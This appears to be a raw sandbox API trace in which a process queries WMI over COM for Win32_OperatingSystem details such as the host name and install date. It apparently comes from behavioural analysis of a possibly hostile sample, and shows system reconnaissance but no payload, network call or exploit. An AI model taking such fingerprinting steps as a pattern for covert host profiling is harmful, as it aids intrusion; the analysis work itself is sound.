	[0221.013] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0221.013] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0221.013] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.013] IWbemClassObject:GetNames (in: This=0x1cd1e8d0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecd08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecd00 | out: pNames=0x1c6ecd00*="\x01ƀ\x08") returned 0x0
	[0221.013] SafeArrayGetDim (psa=0x1b832d20) returned 0x1
	[0221.013] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__GENUS", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6eccfc*=3, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.013] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.014] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0221.014] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.014] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.014] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0221.014] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.014] SysStringLen (param_1="Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x28
	[0221.014] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3f, varVal2=0x0), pType=0x1c6eccfc*=3, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.014] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b832d20*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b858d40, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c6eccfc*=8200, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.015] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__SERVER", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.015] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0221.015] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.015] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0221.015] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="__PATH", lFlags=0, pVal=0x1c6ecd00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6eccfc*=0, plFlavor=0x1c6eccf8*=0 | out: pVal=0x1c6ecd00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6eccfc*=8, plFlavor=0x1c6eccf8*=64) returned 0x0
	[0221.015] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x3f
	[0221.015] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecda0 | out: puCount=0x1c6ecda0*=0x2) returned 0x0
	[0221.015] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecda0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecda0*=0x17, pszText=0x0) returned 0x0
	[0221.015] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ecda0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecda0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.015] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="InstallDate", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171001131325.000000+600", varVal2=0x0), pType=0x1c6ecd8c*=101, plFlavor=0x1c6ecd88*=32) returned 0x0
	[0221.015] SysStringLen (param_1="20171001131325.000000+600") returned 0x19
	[0221.015] IWbemClassObject:Get (in: This=0x1cd1e8d0, wszName="InstallDate", lFlags=0, pVal=0x1c6ecfc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecfbc*=101, plFlavor=0x1c6ecfb8*=32 | out: pVal=0x1c6ecfc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171001131325.000000+600", varVal2=0x0), pType=0x1c6ecfbc*=101, plFlavor=0x1c6ecfb8*=32) returned 0x0
	[0221.016] SysStringLen (param_1="20171001131325.000000+600") returned 0x19
	[0221.870] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0221.870] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0221.870] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0221.871] IUnknown:Release (This=0x321868) returned 0x1
	[0221.871] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd1e240) returned 0x0
	[0221.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1e240, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
	[0221.872] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd1e240, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd1c640) returned 0x0
	[0221.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c640, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd1c640) returned 0x0
	[0221.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c640, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0221.873] WbemDefPath:IUnknown:AddRef (This=0x1cd1c640) returned 0x3
	[0221.873] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0221.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c640, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b8531f0) returned 0x0
	[0221.873] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b8531f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0221.873] WbemDefPath:IUnknown:Release (This=0x1b8531f0) returned 0x3
	[0221.873] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0221.873] WbemDefPath:IUnknown:AddRef (This=0x1cd1c640) returned 0x4
	[0221.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c640, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0221.873] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x3
	[0221.873] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x2
	[0221.874] WbemDefPath:IUnknown:Release (This=0x1cd1e240) returned 0x0
	[0221.874] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x1
	[0221.874] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0221.874] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0221.874] WbemDefPath:IUnknown:AddRef (This=0x1cd1c640) returned 0x2
	[0221.874] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c640, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd1c640) returned 0x0
	[0221.874] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x2
	[0221.874] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x1
	[0221.874] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0221.874] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0221.874] WbemDefPath:IUnknown:AddRef (This=0x1cd1c640) returned 0x2
	[0221.875] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c640, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd1c640) returned 0x0
	[0221.875] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x2
	[0221.875] WbemDefPath:IUnknown:AddRef (This=0x1cd1c640) returned 0x3
	[0221.875] WbemDefPath:IWbemPath:SetText (This=0x1cd1c640, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.875] WbemDefPath:IUnknown:Release (This=0x1cd1c640) returned 0x2
	[0221.875] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0221.875] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0221.875] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.875] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0221.875] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0221.875] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.875] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0221.876] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0221.876] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0221.876] IUnknown:Release (This=0x321868) returned 0x1
	[0221.876] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd1e2e0) returned 0x0
	[0221.876] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e2e0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0221.876] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd1e2e0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd1e300) returned 0x0
	[0221.876] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e300, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd1e300) returned 0x0
	[0221.877] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e300, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0221.877] WbemLocator:IUnknown:AddRef (This=0x1cd1e300) returned 0x3
	[0221.877] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0221.877] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e300, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0221.877] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0221.877] WbemLocator:IUnknown:AddRef (This=0x1cd1e300) returned 0x4
	[0221.877] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e300, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0221.877] WbemLocator:IUnknown:Release (This=0x1cd1e300) returned 0x3
	[0221.878] WbemLocator:IUnknown:Release (This=0x1cd1e300) returned 0x2
	[0221.878] WbemLocator:IUnknown:Release (This=0x1cd1e2e0) returned 0x0
	[0221.878] WbemLocator:IUnknown:Release (This=0x1cd1e300) returned 0x1
	[0221.878] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0221.878] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0221.878] WbemLocator:IUnknown:AddRef (This=0x1cd1e300) returned 0x2
	[0221.878] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e300, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd1e300) returned 0x0
	[0221.878] WbemLocator:IUnknown:Release (This=0x1cd1e300) returned 0x2
	[0221.878] WbemLocator:IUnknown:Release (This=0x1cd1e300) returned 0x1
	[0221.878] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0221.878] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0221.878] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.879] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd1e320) returned 0x0
	[0221.879] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd1e320, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd1b6a8) returned 0x0
	[0222.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b6a8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b83ca40) returned 0x0
	[0222.683] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b83ca40, pProxy=0x1cd1b6a8, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0222.683] WbemLocator:IUnknown:Release (This=0x1b83ca40) returned 0x1
	[0222.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b6a8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b83ca80) returned 0x0
	[0222.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b6a8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b83ca40) returned 0x0
	[0222.684] WbemLocator:IClientSecurity:SetBlanket (This=0x1b83ca40, pProxy=0x1cd1b6a8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.684] WbemLocator:IUnknown:Release (This=0x1b83ca40) returned 0x2
	[0222.684] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x1
	[0222.684] CoTaskMemFree (pv=0x1b839a10) 
	[0222.684] WbemLocator:IUnknown:Release (This=0x1cd1e320) returned 0x0
	[0222.684] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b6a8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b83ca80) returned 0x0
	[0222.684] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0222.685] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0222.689] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x3
	[0222.689] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
